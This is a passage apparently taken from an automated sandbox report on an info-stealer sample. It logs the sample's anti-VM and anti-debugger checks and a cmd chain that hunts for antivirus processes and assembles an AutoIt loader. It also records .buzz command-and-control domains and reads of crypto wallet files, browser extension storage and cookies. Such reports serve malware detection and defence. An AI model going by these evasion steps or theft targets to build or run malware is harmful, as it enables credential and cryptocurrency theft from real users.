                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00ACDC54
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_00ADA087
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_00ADA1E2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_00ACE472
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_00ADA570
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD66DC FindFirstFileW,FindNextFileW,FindClose,14_2_00AD66DC
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A9C622 FindFirstFileExW,14_2_00A9C622
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_00AD73D4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD7333 FindFirstFileW,FindClose,14_2_00AD7333
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00ACD921
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A65FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,14_2_00A65FC8
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696508427p
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                Source: Set-up.exe, Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2380121597.0000000000852000.00000040.00000001.01000000.00000003.sdmp, TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DetectVirtualMachine
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                Source: Set-up.exe, 00000003.00000003.2385517493.0000000001487000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: Climb.com, 0000000E.00000002.3576614656.000000000138C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607804060.000000000171C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604171109.0000000001719000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: Set-up.exe.0.drBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                Source: TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                Source: TNyOrM6mIM.exe, 00000000.00000002.2380121597.0000000000852000.00000040.00000001.01000000.00000003.sdmp, TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: TNyOrM6mIM.exe, 00000000.00000002.2383371849.000000000185A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile opened: SICE
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADF4FF BlockInput,14_2_00ADF4FF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A6338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00A6338B
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A85058 mov eax, dword ptr fs:[00000030h]14_2_00A85058
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,14_2_00AC20AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A92992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00A92992
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A80BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00A80BAF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A80D45 SetUnhandledExceptionFilter,14_2_00A80D45
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A80F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00A80F91
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: spuriotis.click
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00AC1B4D
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A6338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00A6338B
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACBBED SendInput,keybd_event,14_2_00ACBBED
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACEC9E mouse_event,14_2_00ACEC9E
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,14_2_00AC14AE
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AC1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00AC1FB0
                Source: Climb.com, 0000000E.00000000.2417191632.0000000000B23000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2569924765.00000000043EB000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Alt.11.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: pProgram Manager
                Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: Climb.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A80A08 cpuid 14_2_00A80A08
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ABE5F4 GetLocalTime,14_2_00ABE5F4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ABE652 GetUserNameW,14_2_00ABE652
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A9BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00A9BCD2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,2_2_00406831
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: procmon.exe
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: wireshark.exe
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Climb.com, 0000000E.00000002.3577081921.0000000003D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Climb.com, 0000000E.00000002.3577081921.0000000003D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Climb.com, 0000000E.00000002.3577081921.0000000003D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: global trafficTCP traffic: 192.168.2.12:49714 -> 194.87.58.92:80
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
